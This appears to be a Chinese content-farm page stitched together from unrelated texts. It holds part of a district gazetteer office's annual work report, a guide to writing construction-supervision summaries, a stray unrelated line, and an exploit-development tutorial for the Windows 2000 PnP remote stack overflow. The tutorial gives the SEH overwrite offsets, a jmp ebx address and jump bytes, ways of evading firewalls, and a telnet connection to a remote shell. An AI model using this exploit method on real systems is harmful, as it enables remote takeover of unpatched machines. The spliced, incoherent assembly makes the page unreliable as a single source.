⑴供稿队伍建设。《江东区志》编纂已进入磨稿和总纂统稿阶段,为提高工作效率和志稿质量,我们重视各供稿单位的主笔与区志办的互相配合,上下互动,注重供稿队伍的培训。年初,召开全区修志工作会议,采取以会代训的形式,对全区供稿单位修志人员进行业务培训。会上,区志办两位副主编结合我区修志工作实践,分别作了《〈志稿质量标准规定〉解读》及《如何把握方志的文体特点》的讲座,对与会人员业务水平的提高极具指导性和可操作性。4月份,区志办组织召开区志“街道编”主笔座谈会,对“街道编”志稿编写内容进行规范化处理。同时,为鼓励先进,弘扬编修者爱岗敬业、无私奉献的精神,坚持每年开展年度修志工作先进个人评选活动。年初,评选和表彰了10名“20xx年度修志工作先进个人”,极大地调动了修志人员的工作积极性。
⑵编辑队伍建设。为建设一支专兼职结合、结构合理、素质较强、业务娴熟、开拓创新、甘于奉献的区志编辑队伍,我们注重编辑队伍的自身建设。主要从以下几方面入手:一是坚持持之以恒的自修学习。每位编辑通过广泛阅览各类方志期刊和方志网站,自觉汲取修志理论知识,做到学以致用,学用结合,学有成效;二是积极参加上级部门举办的方志业务和专题研讨会。5月份,主编和副主编参加了市第五次地方志专题研讨会,主编撰写的《关于志稿纲目设置的实践与思考》一文在会上作了交流;三是坚持周三上午学习日、碰头会制度。结合工作进程,每周确定专题,印发相关学习资料,认真阅读评议,共同提高。一年来,共组织专题业务学习11次。内容包括:学习省市方志部门重要文件及领导讲话材料,如《浙江省二轮修志创优工程试点工作回顾》《宁波市地方志书质量规定》《宁波市地方志资料征编基本要素质量规范》《关于提升志书内在品质的思考》等;还有从方志网站、期刊、书籍中精选出来的修志理论文章,如《第一轮修志实践提供的借鉴》《记事的概括手法》《方志的语言与文风》《处理交叉重复的常用方法》《关于志稿磨稿之初探》《把握好志书的记述角度》《二轮修志的四个热点问题》《浅谈志稿审稿》等,通过学习,使编辑们边充电边编纂,理论指导实践,确保区志编纂少走弯路,不断提高志稿质量;四是走出去,向兄弟志办学习。4月份,区志编委会副主任王兴国率区志办编辑一行9人,赴北仑区志办学习取经,听取了北仑区志办关于志稿进入评审阶段的工作步骤和经验介绍,从中受到启发和借鉴。
2.稳步推进区志总纂工作
2月份,区志编纂工作取得阶段性成果,《〈江东区志〉初稿第一稿》编印完成,共5册,120余万字。自此,区修志工作开始进入总纂磨稿阶段。[ ]总纂,类似于战场上的总攻阶段,赛场上的百米冲刺,重大项目的终端工程,其重要性不言而喻。我们从实际出发,制定了一套行之有效的磨稿方案,并根据工作进程,不断加以调整和完善,使磨稿工作得以稳步推进。经过近9个月的磨砺,至11月,《〈江东区志〉初稿第二稿》又编印成册,共4册,105万余字。作为修志工作的'阶段性成果,将呈送区地方志编纂委员会领导和各成员单位审阅,旨在遵循“开门修志,众手成志”的原则,广泛征求意见,稽核真伪,查漏补缺,不断完善和提高志稿质量。在总纂磨稿工作中,我们做到:[]
⑴合理分工,优化力量组合。为解决任务重、人手紧的矛盾,我们注重优化力量组合。为加强总纂统稿力量,增设1名副主编。4月份,针对修志工作的各个阶段性的不同特点,对区志办8位编辑重新进行责任分工。安排1名熟悉区情的老同志专门负责分志稿审阅、把关工作,将年轻的、文字功底相对好的编辑充实到责任编辑队伍中,形成“老中青结合”的修志队伍结构形式。同时,建立责任分工制,从主编、副主编,到责任编辑,采取任务逐项分解、落实到人的方法,增强每位编辑的责任意识和紧迫感。下半年,根据总纂磨稿阶段志稿审改的需要,新聘了2名文字功底好、工作责任心强的同志,充实编辑工作力量。8月底与11月初,总纂阶段的工作责任分工也随编辑人员的变动,做了两次同步调整,为总纂工作的保质保量运行打好基础。
⑵反复打磨,完善总纂篇目。篇目是全书的总体设计,是全书之纲,也是衡量志书质量的主要窗口。篇目的修订,贯穿于修志的全过程。从区志编纂之初,到初稿成稿,已六易其稿。进入总纂阶段,随着磨稿工作的不断推进、认识的不断深化,发现初稿纲目还存在着诸多问题,如:要项残缺,归属不当,排序混乱等。我们随即又对区志纲目作了较大力度的修改和调整。4月至5月,进行了5次集中时间的大讨论。发挥集体智慧,逐编、逐章、逐节地加以推敲和修改,按照“符合志体、反映特色、彰显亮点”的要求,修改完善篇目,形成结构合理、领属科学、层次清晰、符合实际的篇目设置。6月,区志总纂稿(总第七稿)纲目定稿。在随后的磨稿过程中,在遵循定稿纲目基础上,又作了适当的局部调整,至10月底,形成了更为完善的初稿第二稿(总第八稿)纲目。
⑶多管齐下,提高磨稿效率。在优化纲目的同时认真探索磨稿方法。3月初,经过集体商议,决定采取主编、副主编与各责任编辑审阅双头并进,材料与行文规范双重把关的方法。然后,制定《区志稿总纂、审查工作计划》。规定工作方法为分工分册,各尽其责。即主编、副主编通读,各责任编辑细磨的方法。4月份,再一次明确总纂阶段的工作要求:思想上提高认识,态度上积极奋进,行动上与时俱进。并设计出《总纂磨稿工作进度表》,要求编辑每星期填写一份,按时规划,及时总结,最大限度地提高工作效率。另外,经常召开审稿研讨会,发挥典型示范,样稿引路的作用。先由主编、副主编择取几个编、章、节,作示范剖析,组织编辑们一起参与讨论,形成共识。然后各责任编辑轮流主讲,剖析手头上在改的志稿,提出问题,彼此交流,互相切磋,共同提高修改能力。一年来,共组织开展了15次高质量、有深度的志稿集体研磨会,对研磨志稿质量起到了积极有效的作用。
3.精心做好分志的审核把关工作
在抓区志的同时,我们也重视对全区分志编纂工作的指导。区志办专门安排1名编辑负责分志稿的终审工作。为确保我区分志(部门志、街道志)的质量,[ ]7月,特制订《江东区部门志、街道志(25部)审核和印书的实施办法》。7月20日,区志办主编、副主编3人参加了《江东宣传志》统稿研讨会,为他们答疑解惑,给予具体指导。为进一步推动分志工作,8月份,专门组织召开了由11家单位的主笔参加的分志编撰工作座谈会,区志办负责主审分志稿的编辑就分志编撰中的一些共性问题,作了具体的剖析和指导。目前,已有《东胜街道志》、《江东城管志》、《江东劳动志》、《江东文化志》4部分志完成总纂,通过了有关专家的评审,其中,《江东城管志》正在付印中,争取年底前出书;另外,《江东民政志》、《江东检察志》、《江东工业志》、《江东宣传志》、《江东农业志》、《江东建设志》、《江东教育志》、《江东卫生志》、《福明街道志》、《东郊街道志》、《百丈街道志》《明楼街道志》、《江东公安志》等已完成或即将完成初稿的撰写,并大多进入了总纂磨稿阶段。
4.继续加大方志工作的宣传力度
为扩大方志工作的宣传面和影响力,继续办好方志两大宣传阵地。
⑴不断充实“江东史志网”网站内容。共发布28篇方志文章,其中,“工作动态”7篇,“史迹回眸”3篇,“业务探讨”8篇,“人物掠影”2篇,“它山撷英”8篇,为全区干部群众读志用志开辟了新的途径。
⑵坚持编印《江东方志》内部期刊。为及时总结我区的修志成果,加强修志工作的指导力度,克服资料匮乏、人手紧张等困难,坚持编印了一期方志期刊。共设领导讲话、业务辅导、地方特色、文物古迹、志稿选登等9个栏目,刊登文章15篇。
篇11:[总结]怎样编写监理工作总结
[总结]怎样编写监理工作总结
介:怎样编写监理工作总结.主要内容包括:监理工作总结的总体要求;监理工作总结的划分;监理工作总结编写的主要内容和组成;编写工作总结要符合下列几点要求.怎样编写监理工作总结工程监理项目竣工后,监理工作总结随即着手进行。项目总监如何结合工程实际,组织各专业监理工程师全面、真实地对监理服务过程进行总结,以正确认识与评价监理工作成效,如何把取得的工作成绩向业主作认真详细地汇报,让其了解监理实施过程以来监理工程的质量和效果,为工程竣工验收划上圆满句号。这也是监理的一项重要工作内容。笔者对监理工作总结的编写有以下体会。
1)监理工作总结的总体要求-工作总结应能客观、公正、真实地反映工程监理的全过程,能对监理效果进行综合描述和正确评价,能反映工程的主要质量状况、结构安全、投资控制等方面的'情况。
2)监理工作总结的划分-工程项目全部完成后,应对监理工作进行两方面的总结:一方面,是向业主提交的监理工作总结,其主要内容包括监理委托合同履行概况;监理任务或监理目标完成情况的评价;由业主提供监理活动办公用房和用品、试验设备等清单,监理工作总结的说明等。另一方面,监理内部提交的工作总结,主要是监理工作经验,可以是某种监理技术、方法的经验,采用某种经济措施、组织措施的经验,也可以是签订监理委托合同或如何处理好业主、设计、承包单位关系的经验等。
3)监理工作总结编写的主要内容和组成-监理工作总结内容一般包括工程概况,项目监理组织体系情况,工程实施“三控、二管、一协调”的措施、效果和经验与教训等四大部分。
3.1工程概况应说明工程所在地理位置、建筑面积、层数层高、设计、施工、建设单位、建筑物功能、结构类型、装修特色和投资情况。
3.2项目监理组织体系情况针对监理合同和监理目标建立了哪些工作制度,如何规范工作程序建立和健全组织机构,从而使工程监理工作得以制度化、规范化地开展。结合工程情况,说明监理部怎样开展工作,提高人员素质,通过努力工作取得业主信任。
3.3对工程实施“三控、二管、一协调”的措施和效果监理的工作质量、进度、造价控制和合同管理、信息管理、组织协调是工程监理的基本内容,须着重说明在这几项工作中如何进行有效控制,采取何种措施和技术方案,取得什么样成绩,要有一定的数字说明和依据资料。
(1)质量控制方面:要体现督促承包单位建立和完善自身质量体系,重权预控、自检、试验检查和旁站等情况,建立质量责任制,规定质量控制的工作职责、工作流程、方法和措施,以及控制标准,取得了多少合格率和优良率等情况。(2)进度控制方面:如何依据合同和业主要求,加强并细化进度计划中监督管理,重视施工进度的记录、信息收集、统计、分析预测和报告工作,从而达到监理进度控制工作成效等情况。(3)造价控制方面:要详细说明做好工程计量与支付的审核签证工作,如何进行合同变更、设计变更等审核控制。在合同工程总量控制的前提下,如何加强分析预测、提高审核工作准确性、可*性和原则性,实现投资效益,累计为业主节约资金程度的情况等;(4)合同管理与组织协调:重点说明熟悉、执行合同的情况,公正地处理各种关系,协调好业主、设计和承包单位各方关系的情况。
3.4经验与教训:包括对监理工作成效和存在问题以及改进的建议,为提高和指导今后监理工作服务。
4)编写工作总结要符合下列几点要求:
(1)用词要准确、明了、简洁、通顺,尽量使用专业语言。并按打印方式处理。
(2)有正规封面:封面文字要注明“xx工程监理工作总结”标题,有业主、承包单位和监理单位名称,以及编制人、审批人和批准人签名。
(3)总结规格尺寸和编号:资料规格尺寸为16K或A4纸,并按公司工程竣工技术资料归档管理的要求统一编目和登记归档。
(4)报送监理工作总结,须有项目总监、以及相应的审核人和批准人(可总工程师)签字,并加盖该项目监理部公章后,由项目总监递交业主。
(5)重要工程监理项目的工作总结需一式三份,即业主二份,项目监理部归档一份。一般工程监理项目的工作总结需一式二份,即业主和项目监理部各一份。
(6)时间规定:监理工作总结须在该工程项目竣工验收后一个月内,及时编写完毕。
不允许。否则拉黑!
篇12:关于Expliot编写指南之PNP溢出漏洞分析和利用
一、漏洞起因及影响范围
漏洞的起因前面已经简单提到了,我们可以参见漏洞公告,
从漏洞公告我们可以看出两点:
1.漏洞起因:Windows 2000版本以上的PNP服务存在远程堆栈溢出漏洞,“远程”是因为该服务可以通过RPC接口来远程调用。
2.影响范围:漏洞只对Windows 2000 有真正威胁,而要攻击XP和Windows2003均有一定的限制。因为对于这个RPC接口,如果在Windows 2000上则可以远程匿名进行调用;在 Windows XP SP0、SP1上,需要以一个有效账号登录后才可以调用;在Windows XP SP2和Windows 2003上,只有管理员组用户才能远程调用,其它账号只能本地调用。
二、远程溢出漏洞的宏定位分析
这部分工作我认为很重要,因此在本文中正好讲清楚一些。所谓“宏定位”,就是指我们应该对我们实现的目标进行预先的分析,调试漏洞是这样,做其它工作也是如此,这一步做好了我们在后面可以少走弯路。
1.对具有溢出漏洞的服务进程的归类。
这里我们将服务进程分为两类。一类是服务自身绑定了端口,可以是TCP 或UDP端口;另一类当然是服务进程自身没有绑定任何端口。对于前一类服务,远程机器直接通过传输层协议(TCP或UDP协议)+应用层协议(如,RPC协议、http协议)来访问服务,IIS、FTP、HTTP都属于这一类服务。如果他们服务存在漏洞,我们可以通过重复绑定端口、复用socket来绕过防火墙的检测。对于后一类服务,远程机器通过传输层协议+命名管道(IPC$)+应用层协议来访问服务的,这也就是为什么我们访问LSASS、WorkStation等服务的时候要先与远程机器建立IPC$空连接的原因。这类漏洞要的利用要躲避防火墙的检测实现起来要困难一些,这个我在后门会提到。
感染利用PNP溢出漏洞的蠕虫后我们的机器会弹出系统显示“系统处理程序c:\\winnt\\system32\\services出乎意料的终止”关机提示框,根据以往的经验,我们可以看出该漏洞是存在于Services进程中,这一点和WorkStation服务一样,因此归为后一类。
2.服务进程接收缓冲区长度是否足够。
这个问题集中体现在用于接收请求的函数(如recv、recvfrom等)第3个参数len上。如果指定的len很小,我们是无法一次性传送功能复杂的很长的ShellCode的,这时就必须采用其他传送的方式,例如把ShellCode分段传送,在10期另一篇溢出文章《编写分段传送的ShellCode》有介绍。接收缓冲区长度问题一般在服务进程自身绑定了端口的溢出漏洞中出现,因此PNP服务中可以暂不考虑。
3.异常发生的位置。
这个问题是指我们向服务程序提交超长的请求后,会覆盖问题函数的返回地址EIP等指针。当函数返回的时候,跳转到我们覆盖数据指定的地址的时候可能发生异常;另外一种情况就是在该函数返回之前,由于我们覆盖了局部变量中其它指针,导致对其进行引用的时候发生异常。简而言之就是ret前与ret后发生异常的区别。对于ret后的异常,我们可能需要通过KiUserExceptionDispatcher和监视点的方法来联合定位溢出点,并且漏洞利用的方式有两种:改写EIP为jmp esp 地址或改写SEH指针;而对于ret前的异常,我们一般通过KiUserExceptionDispatcher来定位溢出点就够了,利用的时候也只能改写 SEH指针。我们预先并不知道PNP溢出漏洞属于哪一类,不过等下面进一步调试后就明确了。
4.如果是问题函数ret后异常,则判断该函数的调用约定。
这个问题是最容易被忽略的。如果我们能够采用jmp esp的利用方式的话,可能很多人会在覆盖jmp esp位置的紧接4个字节开始的地方连接ShellCode,问题就出在这里。
不管是Windows系统进程、第3方软件、还是我们自己用VC6、VC7编写的程序,只要和C/C++相关的函数,一般来说可以分为__cdecl和__stdcall两种调用约定,
采用__cdecl的函数在返回需要调用者恢复实参占用的堆栈,也就是函数只执行返回指令为ret,我们把ShellCode接到保存的EIP后面是没问题的;而采用__stdcall在函数返回是执行指令ret n,自己恢复实参占用的堆栈,我们如果把ShellCode接到保存的EIP后面的话开始n个字节的代码就执行不到了。这也就是为什么我们在构造一些系统进程溢出漏洞(如,RPC、WorkStation、LSA等)攻击代码的时候jmp esp地址后要有若干保留字节的原因。好了,带着剩下的问题,我们继续。
三、PNP溢出漏洞的进一步分析+利用
现在的的牛人们利用编写漏洞代码的速度是越来越快了,蠕虫出来两、三天,攻击代码就已经公布出来了。既然有现成的,我们就直接拿过来用了。于是,我把www.xfocus.net 上公布的代码拿来整理后编译,执行,结果目标机器还是发生了异常。
幸好是用VMWare(+Windows 2000 SP4)作测试,否则用我自己的机器岂不麻烦?很显然,攻击代码存在问题,再看看网上代码中地址填充:
EvilRPC.SDA[76] = 0x3e;
EvilRPC.SDA[77] = 0x1e;
EvilRPC.SDA[78] = 0x02;
EvilRPC.SDA[79] = 0x75;
这个地址不是我们熟悉的地址,需要进一步分析。这样的漏洞分析,VMWARE和SoftICE的组合是再合适不过了,顺便向大家推荐:)。启动VMWARE中的SoftICE,设置断点:
bpx ntdll!KiUserExceptionDispatcher
发生任何异常,SoftICE都会先在这个函数第一条指令停顿下来。关于KiUserExceptionDispatcher函数及其参数的详细介绍,2004年黑防10期ISNO《我是怎样发现CCPROXY溢出漏洞的》一文中有详细介绍,我在05年8期中对Realplay溢出漏洞分析中也有详细的介绍,大家可以参考,这里我只结合本漏洞谈谈。
OK,重新攻击VMWare系统,果然弹出了SoftICE,并停留在函数KiUserExceptionDispatcher入口处。
输入命令addr,可以看到的确是Services进程空间发生了异常。输入命令:d (*(esp + 4) + b4), 得到异常发生时:EBP = 0x005bf874, EIP = 0x76750199。
在输入命令d (*(esp + 4) + c4),得到异常发生时:ESP = 0x005bf864。
调试到这里,由EIP = 0x76750199,我们应该得出了一个结论:该漏洞是典型的ret前异常。换句话说,就是在问题函数返回之前就已经发生了异常。按照前面的宏定位分析,网上公布的代码是一定利用了改写SEH指针的方式,我们来证明一下:
输入命令d fs:0,我们看到当前线程S E H结构位于0x005bf8f8处。
再输入命令d ss:005bf8f8,看到了当前线程SEH结构的8字节。
呵呵,当前线程异常处理函数指针是0x75021e3e,也就是前面看到的填充的地址,证明了我前面的假设。我们将该地址改为Windows 2000下的通用的jmp ebx地址:0x7ffa1571,前面4个字节填写为eb 06 eb 04。然后将VMWare系统重启,再次测试。
这下目标机器没有重启。VMWare系统IP为192.168.1.8,在本机输入telnet 192.168.1.8 8721,立即得到了Shell,修改成功了。
小结:
本文中,我简单地和大家一起对PNP服务溢出漏洞进行了分析。分析的过程不复杂,只是我想通过这样的分析调试,和大家一起分享我调试这些漏洞的一些经验。本文中涉及的宏定位分析,在以后大家分析其它复杂漏洞的时候同样适用。我修改后的代码细节可以参见光盘中的源代码。在Windows 2000+VC6下编译、测试通过。
文档为doc格式
